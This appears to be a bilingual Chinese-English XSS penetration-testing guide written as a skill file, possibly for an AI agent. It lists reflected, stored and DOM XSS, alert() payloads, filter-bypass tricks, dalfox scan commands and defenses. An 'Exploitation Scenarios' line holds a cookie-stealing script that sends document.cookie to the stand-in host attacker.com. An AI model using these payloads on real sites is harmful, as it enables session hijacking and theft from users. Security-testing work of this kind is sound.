Back to Details

xss-testing

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

XSS测试技能

XSS Testing Skills

概述

Overview

跨站脚本攻击(XSS)允许攻击者在受害者的浏览器中执行恶意JavaScript代码。本技能涵盖反射型、存储型和DOM型XSS的测试方法。
Cross-Site Scripting (XSS) allows attackers to execute malicious JavaScript code in the victim's browser. This skill covers testing methods for Reflected XSS, Stored XSS, and DOM-based XSS.

XSS类型

Types of XSS

1. 反射型XSS (Reflected XSS)

1. Reflected XSS

  • 恶意脚本通过URL参数传递
  • 服务器直接返回包含脚本的响应
  • 需要用户点击恶意链接
  • Malicious scripts are passed via URL parameters
  • The server directly returns a response containing the script
  • Requires users to click a malicious link

2. 存储型XSS (Stored XSS)

2. Stored XSS

  • 恶意脚本存储在服务器(数据库、文件等)
  • 所有访问受影响页面的用户都会执行脚本
  • 影响范围更大
  • Malicious scripts are stored on the server (database, files, etc.)
  • All users accessing the affected page will execute the script
  • Has a wider impact scope

3. DOM型XSS (DOM-based XSS)

3. DOM-based XSS

  • 客户端JavaScript处理用户输入不当
  • 不涉及服务器端处理
  • 通过修改DOM结构触发
  • Client-side JavaScript improperly handles user input
  • Does not involve server-side processing
  • Triggered by modifying the DOM structure

测试方法

Testing Methods

基础Payload

Basic Payloads

javascript
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<body onload=alert('XSS')>
javascript
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<body onload=alert('XSS')>

绕过过滤

Bypassing Filters

大小写绕过

Case Bypass

javascript
<ScRiPt>alert('XSS')</ScRiPt>
javascript
<ScRiPt>alert('XSS')</ScRiPt>

编码绕过

Encoding Bypass

javascript
%3Cscript%3Ealert('XSS')%3C/script%3E
&#60;script&#62;alert('XSS')&#60;/script&#62;
javascript
%3Cscript%3Ealert('XSS')%3C/script%3E
&#60;script&#62;alert('XSS')&#60;/script&#62;

事件处理器

Event Handlers

javascript
<img src=x onerror=alert(String.fromCharCode(88,83,83))>
<div onmouseover=alert('XSS')>hover</div>
<input onfocus=alert('XSS') autofocus>
javascript
<img src=x onerror=alert(String.fromCharCode(88,83,83))>
<div onmouseover=alert('XSS')>hover</div>
<input onfocus=alert('XSS') autofocus>

伪协议

Pseudo-protocols

javascript
<a href="javascript:alert('XSS')">click</a>
<iframe src="javascript:alert('XSS')">
javascript
<a href="javascript:alert('XSS')">click</a>
<iframe src="javascript:alert('XSS')">

高级绕过技术

Advanced Bypass Techniques

使用String.fromCharCode

Using String.fromCharCode

javascript
<script>alert(String.fromCharCode(88,83,83))</script>
javascript
<script>alert(String.fromCharCode(88,83,83))</script>

使用eval和atob

Using eval and atob

javascript
<script>eval(atob('YWxlcnQoJ1hTUycp'))</script>
javascript
<script>eval(atob('YWxlcnQoJ1hTUycp'))</script>

使用HTML实体

Using HTML Entities

javascript
&#60;script&#62;alert('XSS')&#60;/script&#62;
javascript
&#60;script&#62;alert('XSS')&#60;/script&#62;

工具使用

Tool Usage

dalfox

dalfox

bash
undefined
bash
undefined

基础扫描

Basic scan

dalfox url "http://target.com/page?q=test"
dalfox url "http://target.com/page?q=test"

指定参数

Specify parameters

dalfox url "http://target.com/page" -d "q=test" -X POST
dalfox url "http://target.com/page" -d "q=test" -X POST

使用自定义payload

Use custom payloads

dalfox url "http://target.com/page?q=test" --custom-payload payloads.txt
undefined
dalfox url "http://target.com/page?q=test" --custom-payload payloads.txt
undefined

Burp Suite

Burp Suite

  • 使用Intruder模块进行批量测试
  • 使用Repeater手动测试
  • 使用Scanner自动检测
  • Use the Intruder module for batch testing
  • Use Repeater for manual testing
  • Use Scanner for automatic detection

浏览器控制台

Browser Console

  • 测试DOM型XSS
  • 检查JavaScript执行环境
  • 调试payload
  • Test DOM-based XSS
  • Check JavaScript execution environment
  • Debug payloads

验证和利用

Verification and Exploitation

验证步骤

Verification Steps

  1. 确认payload被执行
  2. 检查是否被过滤或编码
  3. 测试不同上下文(HTML、JavaScript、属性等)
  4. 评估影响(Cookie窃取、会话劫持等)
  1. Confirm the payload is executed
  2. Check if it is filtered or encoded
  3. Test different contexts (HTML, JavaScript, attributes, etc.)
  4. Evaluate impacts (cookie theft, session hijacking, etc.)

利用场景

Exploitation Scenarios

  • Cookie窃取:
    <script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>
  • 键盘记录:注入键盘事件监听器
  • 钓鱼攻击:伪造登录表单
  • 会话劫持:获取用户会话token
  • Cookie theft: 
    <script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>
  • Keylogging: Inject keyboard event listeners
  • Phishing attacks: Forge login forms
  • Session hijacking: Obtain user session tokens

报告要点

Report Key Points

  • XSS类型(反射/存储/DOM)
  • 触发位置和参数
  • 完整的POC
  • 影响评估
  • 修复建议(输出编码、CSP策略等)
  • XSS type (Reflected/Stored/DOM)
  • Trigger location and parameters
  • Complete POC
  • Impact assessment
  • Fix recommendations (output encoding, CSP policy, etc.)

防护措施

Protection Measures

  • 输入验证和过滤
  • 输出编码(HTML、JavaScript、URL)
  • Content Security Policy (CSP)
  • HttpOnly Cookie标志
  • 使用安全的框架和库
  • Input validation and filtering
  • Output encoding (HTML, JavaScript, URL)
  • Content Security Policy (CSP)
  • HttpOnly Cookie flag
  • Use secure frameworks and libraries